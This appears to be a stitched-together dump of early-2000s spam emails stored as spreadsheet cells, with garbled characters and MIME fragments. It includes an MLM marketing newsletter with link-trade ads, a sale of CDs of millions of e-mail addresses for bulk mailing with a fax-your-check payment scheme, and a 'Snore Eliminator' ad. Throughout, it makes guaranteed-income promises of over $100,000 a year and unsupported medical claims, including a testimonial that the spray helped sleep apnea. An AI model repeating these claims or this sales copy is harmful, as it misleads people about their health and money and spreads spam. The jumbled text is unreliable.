Less than 2cents a visitor.Â  Space is limited.
Order Now! http://www.freepicklotto.comÂ 
Trade Links - businessopps@aol.com
-------------------------------------------------
Stop Smoking - Free Lesson !!
Discover the Secret to Stopping Smoking.
To Master these Powerful Techniques, Come to
http://www.breath-of-life.net
for your Free Lesson.
Act Now!Â  P.S. Tell someone you care about.
Trade Links - jturco3@hotmail.com
-------------------------------------------------
Celebration Sale!
$99.00 on Casinos/Sportsbetting sites, Lingerie stores,
Gift Stores, Adult Sites &amp; Toy Stores.
Mention Ad#BMLM99 to receive this special sale price.
Order Now!
http://www.cyberopps.com/?=BMLM99
-------------------------------------------------
Affiliates of the World!
Top rated affiliate programs, excellent business opportunities,
great marketing resources and free advertising for you!
Visit the site to trade links. http://www.affiliates.uk.com
Trade Links - adrianbold@affiliates.uk.com
-------------------------------------------------
JUST BEEN RELEASED!!
Internet Marketing guru Corey Rudl has just released a
BRAND NEW VERSION of his #1 best-selling Internet Marketing
Course,"The Insider Secret's to Marketing Your Business on
the Internet". A MUST HAVE! So don't hesitate,
visit.. http://www.adminder.com/c.cgi?start&amp;bgmlmezine
-------------------------------------------------
We have a 260 page catalog with over 3000 gift items for men,
women, children - A gift for everyone. We show 100 gift items
on our web site alone, with the catalogÂ  you have access to
the rest. We also feel we have the best prices on the web.
Visit at http://www.treasuresoftomorrow.net
Trade Links - george1932me@yahoo.com
-------------------------------------------------
If you have a product, service, opportunity or quality merchandise
that appeals to people worldwide, reach your targeted audience!
For a fraction of what other large newsletters charge you can exhibit
your website here, and trade links for only $8 CPM.Â  Compare
that
to the industry average of $10-$15 CPM. Why?... Because as a
valuable member we want you to be successful! Order today -
Showcases are limited and published on a first come, first serve
basis.
For our secure order form, click here: http://bannersgomlm.com/ezine
 Win A FREE Ad In Community &amp; CommentaryÂ Â To keep this interesting, how about this, every month we'll
draw a name from the replies and that person will win one
Sponsorship Showcase ad in the Community &amp; Commentary, for FREE.
That's a value of over $700.00! Respond to each weekly survey,
and increase your chances to win with four separate entries.
Â Â Â Â Â Â Â Â Â Â  QUESTION
OF THE WEEK (07/06/01)...
Â Â Â Â  No right or wrong answers, and just by answering
Â Â Â Â  you are entered to win a Showcase ad - Free!
Â Â Â Â  ~~~ Do you spend more or less time ~~~
Â Â Â Â Â  ~~~ online in the summer months? ~~~
Â Â Â Â  MoreÂ Â Â Â Â Â Â 
mailto:one@AEOpublishing.com
Â Â Â Â  LessÂ Â Â Â Â Â Â 
mailto:two@AEOpublishing.com
Â Â Â Â  SameÂ Â Â Â Â Â Â Â 
mailto:three@AEOpublishing.com
To make this as easy as possible for you, just click on the
e-mail address that matches your answer - you do not need to
enter any information in the subject or body of the message.
** ADD YOUR COMMENTS!Â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question.Â  Multiple responses
from the same individual will be discarded.Last Weeks's Results (06/29/01)
Â Â Â Â  ~~~ What is the goal of your website? ~~~
Â Â Â Â  SellÂ Â Â Â Â Â Â Â 40%
Â Â Â Â  Get LeadsÂ Â Â Â Â Â Â Â 20%
Â Â Â Â  Build BrandingÂ Â Â Â Â Â 5%
Â Â Â Â  Provide InformationÂ  20%
Â Â Â Â  OtherÂ Â Â Â Â Â Â Â  15%Comments:
----------------------------
Our web site is initially designed to get leads, build 
branding, and provide information.......with a 12 month goal 
of selling our service more specifically via a shopping cart. 
We offer a service and at this time take deposits and payments 
via our site.
Our site has been up less than 2 months and our expectation 
was that we would refer to our site for leads developed in 
traditional media and by referral for more information, and 
to make a professional impression on someone you may not 
meet before providing service.
The growth of our customer base shopping on line has grown 
outside of anyone's expectations.......certainly mine and 
I've been in this business for 25 years. The Internet is not 
dead in the horse business, it is just getting it's legs, and 
the folks using it want to get all the ancillary services 
on-line as well. Our site (the first we've developed) has 
exceeded our expectations, and we aren't satisfied with it 
yet.......we just wanted to get it there for information!
 Jeff and Rebecca Marks http://www.grand-champion.com
-------------------------------------------------
Branding. While quality customer service and product 
have been and will always be our top priority brand building 
Zesto is our most challenging task.
Zesto.com ranks very high and most often #1 or 2 on 
all major search engines and directories even Yahoo entering 
the keyword zesto. The problem is simply that,who if anyone 
would type the keyword zesto, therefore we must try to 
build our brand by ensuring that generic keywords associated with our products (citrus peel) are used throughout 
our site as well as search engine submissions.
Fortunately owning a non generic domain short, easy 
to remember and trademarked works in our favor because 
the marketability potential is limitless.
Arlene Turner  http://www.zesto.com 
Â Â To change your subscribed address,
send both new and old address to Submit
See below for unsubscribe instructions.Please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email us Â ::Â  visit our sitephone: 
    This email was sent to jm@netnoteinc.com, at your request, by Your Membership Newsletter Services.  
    Visit our Subscription Center to edit your interests or unsubscribe.
    View our privacy policy.  
    Powered by---1347074105.994417746234.JavaMail.RovAdmin.rovweb002--</t>
  </si>
  <si>
    <t xml:space="preserve">
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others?Free Classifieds?  (Don't work)
Web Site?          (Takes thousands of visitors)
Banners?           (Expensive and iffy)
E-Zine?            (They better have a huge list)
Search Engines?    (Easily buried with thousands of others)Bulk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to:SELLERS COMMUNICATIONS
2714 WEST 5th
North Platte, Ne 69101
U.S.A.
        CHECK BY FAX SERVICES OR CREDIT CARO INFO: 
O R D E R   N O W . . . SAME DAY SERVICE (M-F) if your order
is received before 3pm Central . To place an order, you can call us at: 
1-308-534-2098  Are fax your order to 1-208-975-0773This Number is for credit Card Orders Only!!!
            CHECK BY FAX SERVICES!
__________________________________________To order, via credit card simply cut/paste and print out the
EZ ORDER FORM below and fax to our office today.
          ***** NOW ONLY $100! *****This "Special Price" is in effect for the next seven days,
after that we go back to our regular price of $250.00 ...
Don't delay... you can be in business tomorrow!  We accept Visa, Mastercard, Amex, Disc and Checks by Fax.----------------------Cut &amp; Paste----------------------
---------------------EZ Order Form---------------------_____Yes! I want everything!  I am ordering within 72 hours.
Include my FREE "Business On A Disk" bonus along with your 
Millions of E-Mail addresses on CD (plus 1,093,808 bonus addresses)
for the special price of only $100.00 + shipping as indicated
below._____Yes!  I missed the 72 hour special, but I am ordering
CD WITH, super clean e-mail addresses within 7 days for the
"special" price of only $250.00 + s&amp;h._____Oop's I missed the 72 hour and 7 day "specials".  I am
ordering The Cd  at the regular price of $250.00 + s&amp;h.     ***PLEASE SELECT YOUR SHIPPING OPTION***____I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Carefully***NOTE:  Orders cannot be shipped without complete information
including your signature.  No exceptions!NAME____________________________________________________COMPANY NAME____________________________________________ADDRESS_________________________________________________
(FedEx can only ship to street addresses - no P.O. boxes)CITY, STATE, ZIP________________________________________PHONE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
is received before 3pm Central . To place an order, you can call us at: 
 1-308-534-2098  Are fax your order to 1-208-975-0773  
This Number is for credit Card Orders Only!!!
            CHECK BY FAX SERVICES!If you would like to fax a check, paste your check below and fax it to our office 
along with the EZ Order Form forms to: 1-520-244-5912**********************************************************    ***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR CHECK HERE AND FAX IT TO US AT   1-208-975-0773
**********************************************************If You fax a check, there is no need for you to mail the
original.  We will draft a new check, with the exact
information from your original check. All checks will be
held for bank clearance. (7-10 days) Make payable to: 
"SELLERS COMMUNICATIONS"
-=-=-=-=--=-=-=-=-=-=-=Remove Instructions=-=-=-=-=-=-=-=-=-=-=-=**************************************************************
Do not reply to this message - 
To be removed from future mailings:
mailto:nomore2001@asean-mail.com?Subject=Remove
**************************************************************</t>
  </si>
  <si>
    <t xml:space="preserve">Snoring problems? Let Snore
Eliminator's all natural ingredients help you
sleep!Â Â Â Â Â Â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body!!People who snore have a higher risk of developing heart attacks, high blood
pressure, or strokes!! Snoring
also causes sleep disturbances that lead to increased anxiety,
hyperirritability, and decreased memory!
Individuals who snore have a 90% chance of daytime fatigue. Nine out of every
ten victims are male!How the Snore Eliminator will help you!What Causes Snoring?Over-relaxed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airway.The hidden dangers of snoring?
Snoring could increase the chances of a heart attack if not treated
Hypertension and increased anxiety are associated with snoring
Snoring causes sleep apnea a serious treatable medical conditionSnoring decreases sexual performance
by half, due to lack of oxygen
to the brain which decreases sexual responsiveness.
Most people who snore have a shortage
of oxygen for a
significant portion of that person's life. In recent studies, daytime fatigue
and cardiovascular disorder are related to snoring. In a few cases, heavy
snoring is a sign of potentially life -threatening problem. Sleep apnea in which
breathing stops for a second or even minutes at a time and finally resumes with
snorting and tossing around. This pattern may be repeated hundreds of times all
night long. The result is chronic oxygen shortage, which leads to abnormal heart
rhythms, high blood pressure, and heart strain.How the Snore Eliminator works!Snore Eliminator offers a unique break through with its all natural
enzymes which metabolize the
secretions, allowing the body to absorb them into the back of the throat. The
herbs reduce tissue swelling. The result is to open the airway and smooth the
airflow. This in turn eliminates the snoring for hours at a time. It also
reduces the noise made by
breathing through the mouth while sleeping.
By simply spraying the back of the throat, tongue and uvula with our special
formula, manufactured using our patented break through process, the soft tissue
is coated. This allows the throat
a chance to relax thus a
reduced amount of snoring. In most cases snoring is eliminated. Snore Eliminator
coats the throat area with a unique patented process of all natural lubricants.TESTIMONIALS from several of our satisfied customers:Lorenzo writes...
I am having a good nights sleep, finally. I used to wake myself up during the
night which was a real bummer as I would not always go back to sleep. Sleeping
through the night is great. Thanks a lot Snore Eliminator.
PS: My girlfriend loves it as much or more than I do.
Alex writes...
My husband uses it for another reason. He has a problem with blocked nasal
passages. While he's asleep the passages close, he stops breathing and he wakes
up gasping. When he takes Snore Eliminator his nose stays clearer and he's able
to sleep more restfully.
Thank you for a product that has really helped us!
Glen writes...
In February 1995, I was diagnosed with severe sleep apnea. A CPAP was the
suggested treatment for my affliction, but it did not help my condition. I heard
your advertisement and ordered a bottle of Snore Eliminator and my sleep
improved immediately. I continue to use it and my sleep has been better than it
had been in years. Thanks.
Steve writes...
Let me take this opportunity to thank you for your wonderful product and tell
you how much my wife, Tracy, and I appreciate the quiet nights we have enjoyed
since discovering it. It's very rare when a product actually delivers what it
promises but Snore Eliminator truly does. We have tried most of the other
advertised remedies without any satisfaction and I am very pleased to be able to
write and say that this product is as close as you can get to an absolute
"Miracle".If you have a snoring problem what can you do?
Who would you turn to? Look no further, the answer to your snoring problems are
over. Let our patented Snoring Eliminator help you get through those
sleepless nights. We guarantee it. In fact, we are so confident in Snore
Eliminator that if you are not 100% satisfied with it you can return the unused
portion for a full refund, no questions asked*
It is estimated that 90 million Americans, over the age of 18,suffer from
habitual snoring.How to Use Snore Eliminator:Open your mouth
Hold the 4oz bottle about four inches from your open mouth
Spray one or two application onto the back of the throat.Snore Eliminator is safe to use nightly because of its' natural ingredients.
Please note as with any health-related product, it is recommended that you
consult with your physician prior to use if you have any medical conditions.
Â A Money Back Guarantee! *We are so confident in Snore Eliminator that we offer a 30-day money back
guarantee. Merely return the unused portion of Snore Eliminator within 30 days
and we will refund your purchase price with no questions asked!
Our normal price for Snore Eliminator is $39.95, but for a limited time only,
you can purchase it for only $21.00
plus $4.95 for shipping
handling. We will also continue to offer you Snore Eliminator at this low price
as long as you purchase from us in the future. To take advantage of this savings
you must order within the next 10 days.For Shipping OUTSIDE the US please add $11.00.
Here's How to order***********************************************************************
ORDER TODAY:
SEND Only $25.95 US
(CREDIT CARD, CASH, CHECK, OR MONEY ORDER)
For Shipping OUTSIDE the US please add $11.00.
or
2 MONTH SUPPLY for only $42.00!
**This is a savings of $4.95 per bottle!!
For Shipping OUTSIDE the US please add $11.00.
(CREDIT CARD, CASH, CHECK, OR MONEY ORDER)
Shipping is included!
To place your order merely fill out the following form and fax to 1-775-898-9.0.5.1.
If this line is busy, please try faxing to 1-253-541-0.0.7.9.
or mail to:
Internet Information Services
PO Box 21442
Billings, MT 59104
(ALL ORDERS FILLED WITHIN 24 HOURS OF RECEIVING THEM)
Please allow 7 days for delivery.
*************************
Credit Card Order Form
Name on Credit Card:
Address:
City/State/ZIP:
Your email address:
++++++++++++++++++++++++++++++++++++++++
PLEASE CIRCLE ONE for the quantity you wish to order.
Please send me a ONE month supply for $25.95
For Shipping OUTSIDE the US please add $11.00.
Please send me a TWO month supply for $42.00
For Shipping OUTSIDE the US please add $11.00.
(This is a savings of $13.90 off our regular price.)
Â 
Credit Card Number:
Date Credit Card Expires:
If you do not receive your order within 10 days, please send us a fax letting
us know of the late arrival.
We will then contact you to figure out why you have not received your order.
Please tell us your phone Number:
Please tell us your fax Number:
Â 
To order by Check or Money Order:
MAKE YOUR CHECK PAYABLE TO:
Internet Information Services
Â 
Name:
Address:
City/State/ZIP:
E-mail Address:
If you do not receive your order within 10 days, please send us a fax letting
us know of the late arrival.
We will then contact you to figure out why you have not received your order.
Please tell us your phone Number:
Please tell us your fax Number:
Â 
Thank you for your business,
Internet Information Services
PO Box 21442
Billings, MT 59104
Fax to 1-775-898-9.0.5.1.
If this line is busy, please try faxing to 1-253-541-0.0.7.9.
Â 
Copyright (c) 1997-2000
All Rights Reserved
Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â ++++++++++++++++++++++++++++++++++++++++++++++++++++++++
This ad is produced and sent out by:
Universal Advertising Systems
To be removed from our mailing list please email us at
vanessagreen@freeze.com with remove in the subject line or
call us toll free at 1-88.8-60.5-2.4.8.5 and give us your email address or
write us at:
Central D B R e m o v a l, PO Box 12 00, Oranje.st.ad, Ar.ub.a
++++++++++++++++++++++++++++++++++++++++++++++++++++++++Content-Transfer-Encoding: 7BIT
</t>
  </si>
  <si>
    <t xml:space="preserve">
--261908501.996294421526.JavaMail.RovAdmin.rovweb003
Content-Type: text/plain; charset=iso-8859-1Your Membership Community &amp; Commentary (July 27, 2001)
It's All About Making MoneyInformation to provide you with the absolute 
best low and no cost ways of providing traffic 
to your site, helping you to capitalize on the power 
and potential the web brings to every Net-Preneur. --- This Issue Contains Sites Who Will Trade Links With You! --- -------------
IN THIS ISSUE
-------------
5 Ways to Create a Unique Website
Member Showcase
Commentary Quick Tips
Win A FREE Ad In Community &amp; Commentary||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;
    Today's Special Announcement:
||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;Absolute Gifts Etc. Offers thousand of high quality gifts &amp; unique 
collectibles. At wholesales prices, Some items are "Exclusive" and 
were designed for our collection only. Lots of freebees! 
Plus bonus bucks will save you even more. 
Business opportunities,Total weight loss system &amp; much more!
http://www.absolutegiftsetc.com ||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;You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5 Ways to Create a Unique Website
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Internet users have no doubt seen several websites of identical
design. This is often because webmasters do not have the
ability or time to design and create unique websites. These
five points will help you come up with a one-of-a-kind design
for your website.1. Navigation SystemDeciding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(http://www.webmasterbase.com) for example. There is a list 
of categories on the left, and information about the network 
on the top bar.It is not recommended that you place your navigation at the
bottom of the page because:- People see the top of the page first
- If you have a lot of content on one page, the navigation gets
   pushed to bottom of the page... away from the visitor.2. Color SchemeWhen you are choosing colors, make sure they contrast. For
example, do not use bright green and florescent pink. Some
colors that are often used are white on black or black on
white.A wonderful utility that is web-based and free is Color Schemer
(http://www.godigitalstudios.com/www/color/), created by Aaron
Epstein. Many other programs exist that can assist you in
choosing colors. Try doing a search on FreewareFiles 
(http://www.freewarefiles.com), Tucows (http://www.tucows.com),
or Download.com (http://www.download.com) for "color schemer."3. Content WindowThis is the brain of the website. Make sure that the text here
is easy to read and understand.Also, provide your own original content. People do not want to
hear what somebody else has to say. They want to hear what 
you want to say! While it might be time consuming to write
your own content, it sure is worth it.To find content for your website, try searching at
EzineArticles (http://www.ezinearticles.com). Other people may
have used the articles, but if you become good friends with the
authors, they may send you new content as they write it. Be
careful though. Do not use too much content from other 
authors, as mentioned above.4. Font(s)Several types of fonts exist. The first one I will discuss is
fixed width or monospace, similar to Courier or Courier New.
Fixed width fonts are good for displaying code (like HTML.)Another type of font is called sans serif. It is similar to
Arial (Windows) or Helvetica (Macintosh). This font can be 
used for long pieces of text.The final type of font is called serif because it has serifs,
or curves, in each letter. Often, this font is called Times
(Windows) or Georgia (Macintosh). This font, like sans serif,
is often used for long blocks of text. It is preferred because
its rounded edges lead the reader to the next letter, making it
easier to read.5. AdvertisingAh, everybody's favorite... advertising! This is one of thing 
that almost every website has. The most common type is what 
is known as "banner" advertising. It is called that because it is 
long and thin (like a paper banner.) How long you ask? The 
generic kind is 468 pixels wide by 60 pixels high.New sizes however are being used. Take for example the new
style called "skyscraper" -- so called for a reason: it looks
like a skyscraper. It is tall (about 425 pixels) but not too
wide (about 100-125 pixels.)Finding a way to place advertising can be tricky. Banners 
used to be placed (and still are) only at the top of the page.
Nevertheless, banners are starting to be placed in the middle
of the page, at the bottom, or along the side.    ConclusionThese are only five things to consider when designing a
website. There are many others however. Let me know what 
you find that helps you create a unique website. My email 
address is mailto:corbb@justforwebmasters.com.-------------------------------------
About the Author...Written by Corbb O'Connor. Corbb is the Webmaster of
http://www.justforwebmasters.com, a website that focuses on
teaching Webmasters how to create, gain traffic to, and make
money from their own websites. He is also the editor of a FREE
bi-weekly newsletter entitled, "The Guided Webmaster." To
subscribe now, send an email to:
mailto:subscribe@justforwebmasters.com?subject=article-subscribe. 
Information about this newsletter can be obtained from his website.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Member Showcase
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Examine carefully - Those with email addresses included WILL 
TRADE LINKS with you... You are encouraged to contact them. 
There Are Many Ways To Build A Successful Business - Just look 
at these successful sites &amp; programs other members are involved 
in...
-------------------------------------------------Life Without Debt! What would you do with 5,000 10,000 
20,000 100,000? A "Dream Team" of heavy hitters are 
gathering to promote Life Without Debt. Get in NOW to 
receive Massive spillover in the 2x matrix. 
http://trafficentral.com/lwd/index.htm
---------------------------------------------------------------------EARN $100,000+ PER YEAR! - FULLY GUARANTEED!
We do all the selling for you, 365 days a year! 
We also offer you a GUARANTEED INCOME of up to 
$100,000+p.a. - working just 2 hours a day. GUARANTEED 
http://www.ArmchairTycoon.com/profits2you
Trade Links - mailto:walter@profits2you.com
---------------------------------------------------------------------CashPO is Paid E-Mail Central!
Get FREE REFERRALS, _KEEP_ referrals when new
programs are added; free advertising to other
members, and soon chances to win cash!
http://www.cashpo.net/CashPO/openpage.php4?c=2
---------------------------------------------------------------------JUST BEEN RELEASED!!
Internet Marketing guru Corey Rudl has just released a BRAND NEW
VERSION of his #1 best-selling Internet Marketing Course,"The Insider
Secret's to Marketing Your Business on the Internet". A MUST HAVE!
So don't hesitate, visit.. http://www.adminder.com/c.cgi?start&amp;bgmlmezine
--------------------------------------------------------------   If you have a product, service, opportunity or quality 
  merchandise that appeals to people worldwide, reach your 
  targeted audience! For a fraction of what other large 
  newsletters charge you can exhibit your website here, and 
  trade links for only $8 CPM.ï¿½ Compare that to the 
  industry average of $10-$15 CPM. Why?... Because as a 
  valuable member we want you to be successful! Order today - 
  Showcases are limited and published on a first come, first 
  serve basis. For our secure order form, click here: 
  http://bannersgomlm.com/ezine 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Commentary Quick Tips
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Product Recommendation:If you don't have a fax machine, or your phone, computer, 
and fax all share the same line, you should check out 
http://www.efax.com.  You can get a unique phone number and 
receive faxes and voicemail sent to you via email, all 
totally free.  It's been a life saver for me.Submitted by JT Timmer
Animal_Instincts@RagingBull.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~Do you have a marketing hint, product recommendation, or
online gem of wisdom you'd like to share with your fellow
subscribers? With your 2 - 10 line Quick Tip include your
name and URL or email address and  we'll give you credit
for your words of wisdom.And, if you're looking for free advertising, this isn't
the place - check out the 'One Question Survey' below for
a great free advertising offer.Send it in to mailto:Submit@AEOpublishing.com
with 'Quick Tip' in the Subject block.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Win A FREE Ad In Community &amp; Commentary
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=To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QUESTION OF THE WEEK (07/27/01)...
 No right or wrong answers, and just by answering
 you are entered to win a Sponsorship Showcase  - Free! ~~~ Are you concerned about identity theft online? ~~~yes   mailto:yes@AEOpublishing.com
no    mailto:no@AEOpublishing.comTo make this as easy as possible for you, just click on the
hyperlinked answer to send us an e-mail  - you do not need to
enter any information in the subject or body of the message.** ADD YOUR COMMENTS!  Follow directions above and
add your comments in the body of the message, and we'll
post the best commentaries along with the responses.You will automatically be entered in our drawing for a free
Sponsorship ad in the Community &amp; Commentary. Please
respond only one time per question.  Multiple responses
from the same individual will be discarded.Last Weeks's Survey Results &amp; Comments  (07/20/01) ~~~ Do you promote your website only online? ~~~yes   45%
no    55%Comments:
~~~~~~~~~"Just because we're working online doesn't mean we should forget
to market offline as well.  Heck,some days I get more leads in the 
supermarket than I do online."
-- Henry C.  http://www.fastersurfing.com
~~~~~~~~~"I attach mailing labels with my message printed on them on the 
back of my business cards, on flyers, brochures or anything that 
I hand out to my customers."
-- Rick A.   http://www.iprocenter.com/rickarmstrong  
~~~~~~~~~"I promote my business opportunity website both online and 
offline. The printed media is very valuable to promote my presence 
on the internet. Having a website is just like having a "sign-post 
in the desert". Without anyone knowing where to look to find you, 
your website is a museum with no visitors.
-- Jerry P.    http://www.wealthtoday.net/key4health=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
To change your subscribed address, send both new and old 
address to mailto:Submit@AEOpublishing.com 
See the link (below) for our Subscription Center to unsubscribe 
or edit your interests. Please send suggestions and comments to: 
mailto:Editor@AEOpublishing.com 
I invite you to send your real successes and showcase 
your strategies and techniques, or yes, even your total bombs, 
"Working Together We Can All Prosper." 
mailto:Submit@AEOpublishing.com For information on how to sponsor Your Membership 
Community &amp; Commentary visit: http://bannersgomlm.com/ezine Copyright 2001 AEOpublishing.com 
------------------------------------------------
web: http://www.AEOpublishing.com
------------------------------------------------This email has been sent to jm@netnoteinc.com at your 
request, by Your Membership Newsletter Services.Visit our Subscription Center to edit your interests or unsubscribe.
http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.l89m7847&amp;m=bd7n7877&amp;ea=jm@netnoteinc.comView our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jspPowered by 
Constant Contact(R)
www.constantcontact.com
--261908501.996294421526.JavaMail.RovAdmin.rovweb003
Content-Type: text/html; charset=iso-8859-1
Your Membership Community &amp; Commentary, 07-27-01Your Membership Community &amp; Commentary
ï¿½ï¿½It's All About Making Money
July 27, 2001ï¿½ï¿½in this issue
5 Ways to Create a Unique Website
Member Showcase
Commentary Quick Tips
Win A FREE Ad In Community &amp; CommentaryToday's Special Announcement:
Absolute Gifts Etc. Offers thousand of high quality gifts &amp; unique
collectibles. At wholesales prices, Some items are "Exclusive" and
were designed for our collection only. Lots of freebees!
Plus bonus bucks will save you even more.
Business opportunities,Total weight loss system &amp; much more!
www.absolutegiftsetc.com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ï¿½ï¿½Information to provide you with the absolute 
best low and no cost ways of providing traffic 
to your site, helping you to capitalize on the power and potential the web brings to every Net-Preneur. 
--- This Issue Contains Sites Who Will Trade Links With You! --- 
 5 Ways to Create a Unique Websiteï¿½ï¿½Internet users have no doubt seen several websites of
identical design. This is often because webmasters do not
have the ability or time to design and create unique websites.
These five points will help you come up with a one-of-a-kind
design for your website.
1.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(http://www.webmasterbase.com)
for example. There is a list
of categories on the left, and information about the network
on the top bar.
It is not recommended that you place your navigation at the
bottom of the page because:
- People see the top of the page first
- If you have a lot of content on one page, the navigation
Â Â Â  gets pushed to bottom of the page... away from the
visitor.
2. Color Scheme
When you are choosing colors, make sure they contrast.
For example, do not use bright green and florescent pink.
Some colors that are often used are white on black or black
on white.
A wonderful utility that is web-based and free is Color
Schemer (http://www.godigitalstudios.com/www/color/),
created by Aaron Epstein. Many other programs exist that
can assist you in choosing colors. Try doing a search on
FreewareFiles (http://www.freewarefiles.com),
Tucows
(http://www.tucows.com), or Download.com
(http://www.download.com) for
"color schemer."
3. Content Window
This is the brain of the website. Make sure that the text
here is easy to read and understand.
Also, provide your own original content. People do not want
to hear what somebody else has to say. They want to hear
what you want to say! While it might be time consuming to
write your own content, it sure is worth it.
To find content for your website, try searching at
EzineArticles (http://www.ezinearticles.com).
Other people
may have used the articles, but if you become good friends
with the authors, they may send you new content as they
write it. Be careful though. Do not use too much content
from other authors, as mentioned above.
4. Font(s)
Several types of fonts exist. The first one I will discuss is
fixed width or monospace, similar to Courier or Courier New.
Fixed width fonts are good for displaying code (like HTML.)
Another type of font is called sans serif. It is similar to
Arial (Windows) or Helvetica (Macintosh). This font can
be used for long pieces of text.
The final type of font is called serif because it has serifs,
or curves, in each letter. Often, this font is called Times
(Windows) or Georgia (Macintosh). This font, like sans serif,
is often used for long blocks of text. It is preferred because
its rounded edges lead the reader to the next letter, making
it easier to read.
5. Advertising
Ah, everybody's favorite... advertising! This is one of thing
that almost every website has. The most common type is
what is known as "banner" advertising. It is called that
because it is long and thin (like a paper banner.) How long
you ask? The generic kind is 468 pixels wide by 60 pixels high.
New sizes however are being used. Take for example the
new style called "skyscraper" -- so called for a reason: it
looks like a skyscraper. It is tall (about 425 pixels) but not
too wide (about 100-125 pixels.)
Finding a way to place advertising can be tricky. Banners
used to be placed (and still are) only at the top of the
page.Â  Nevertheless, banners are starting to be placed in
the middle of the page, at the bottom, or along the side.
Conclusion
These are only five things to consider when designing a
website. There are many others however. Let me know
what you find that helps you create a unique website. My
email address is mailto:corbb@justforwebmasters.com.
-------------------------------------
About the Author...
Written by Corbb O'Connor. Corbb is the Webmaster of
http://www.justforwebmasters.com,
a website that focuses
on teaching Webmasters how to create, gain traffic to, and
make money from their own websites. He is also the editor
of a FREE bi-weekly newsletter entitled, "The Guided
Webmaster." To subscribe now, send an email to:
mailto:subscribe@justforwebmasters.com?subject=article-subscribe.
Information about this newsletter can be obtained from his website. 
Member Showcaseï¿½ï¿½Examine carefully - Those with email addresses included WILL
TRADE LINKS with you... You are encouraged to contact them.
There Are Many Ways To Build A Successful Business - Just look 
at these successful sites &amp; programs other members are involved
in...
-------------------------------------------------
Life Without Debt! What would you do with 5,000 10,000
20,000 100,000? A "Dream Team" of heavy hitters are
gathering to promote Life Without Debt. Get in NOW to
receive Massive spillover in the 2x matrix.
http://trafficentral.com/lwd/index.htm
---------------------------------------------------------------------
EARN $100,000+ PER YEAR! - FULLY GUARANTEED!
We do all the selling for you, 365 days a year!
We also offer you a GUARANTEED INCOME of up to
$100,000+p.a. - working just 2 hours a day. GUARANTEED
http://www.ArmchairTycoon.com/profits2you
Trade Links - mailto:walter@profits2you.com
---------------------------------------------------------------------
CashPO is Paid E-Mail Central!
Get FREE REFERRALS, _KEEP_ referrals when new
programs are added; free advertising to other
members, and soon chances to win cash!
http://www.cashpo.net/CashPO/openpage.php4?c=2
---------------------------------------------------------------------
JUST BEEN RELEASED!!
Internet Marketing guru Corey Rudl has just released
a BRAND NEW VERSION of his #1 best-selling Internet
Marketing Course,"The Insider Secret's to Marketing Your
Business on the Internet". A MUST HAVE! So don't
hesitate, visit.. http://www.adminder.com/c.cgi?start&amp;bgmlmezine
-------------------------------------------------
If you have a product, service, opportunity or quality 
merchandise that appeals to people worldwide, reach your targeted audience!
For a fraction of what other large newsletters charge you can 
exhibit your website here, and trade links for only $8 CPM.Â  
Compare that to the industry average of $10-$15 CPM. 
Why?... Because as a valuable member we want you 
to be successful! Order today -
Showcases are limited and published on a first come, first serve
basis.
For our secure order form, click here: http://bannersgomlm.com/ezine
Commentary Quick Tipsï¿½ï¿½Product Recommendation:
If you don't have a fax machine, or your phone, computer,
and fax all share the same line, you should check out
http://www.efax.com.Â  You can
get a unique phone number
and receive faxes and voicemail sent to you via email, all
totally free.Â  It's been a life saver for me.
Submitted by JT Timmer
Animal_Instincts@RagingBull.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Do you have a marketing hint, product recommendation, or
online gem of wisdom you'd like to share with your fellow
subscribers? With your 2 - 10 line Quick Tip include your
name and URL or email address andÂ  we'll give you credit
for your words of wisdom.
And, if you're looking for free advertising, this isn't
the place - check out the 'One Question Survey' below for
a great free advertising offer.
Send it in to mailto:Submit@AEOpublishing.com
with 'Quick Tip' in the Subject block. 
Win A FREE Ad In Community &amp; Commentaryï¿½ï¿½To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Â QUESTION OF THE WEEK (07/27/01)...
Â No right or wrong answers, and just by answering
Â you are entered to win a Sponsorship ShowcaseÂ  - Free!
Â ~~~ Are you concerned about identity theft online? ~~~
yesÂ Â Â  mailto:yes@AEOpublishing.com
noÂ Â Â  mailto:no@AEOpublishing.com
To make this as easy as possible for you, just click on the
hyperlinked answer to send us an e-mailÂ  - you do not need to
enter any information in the subject or body of the message.
** ADD YOUR COMMENTS!Â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question.Â  Multiple responses
from the same individual will be discarded.
Last Weeks's Survey Results (07/20/01)
Â ~~~ Do you promote your website only online? ~~~
yesÂ Â  45%
noÂ Â Â  55%
Comments:
~~~~~~~~~
"Just because we're working online doesn't mean we should
forget to market offline as well.Â  Heck, some days I get more
leads in the supermarket than I do online."
-- Henry C.Â  http://www.fastersurfing.com
~~~~~~~~~
"I attach mailing labels with my message printed on them
on the back of my business cards, on flyers, brochures or
anything that I hand out to my customers."
-- Rick A.Â Â  http://www.iprocenter.com/rickarmstrong
~~~~~~~~~
"I promote my business opportunity website both online
and offline. The printed media is very valuable to promote
my presence on the internet. Having a website is just like
having a "sign-post in the desert". Without anyone
knowing where to look to find you, your website is a
museum with no visitors.
-- Jerry P.Â Â Â  http://www.wealthtoday.net/key4health 
ï¿½ï¿½To change your subscribed address,
send both new and old address to Submit
See the link (to the left) for our Subscription Center to unsubscribe or edit your interests.Please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ï¿½::ï¿½ visit our site 
    This email was sent to jm@netnoteinc.com, at your request, by Your Membership Newsletter Services.  
    Visit our Subscription Center to edit your interests or unsubscribe.
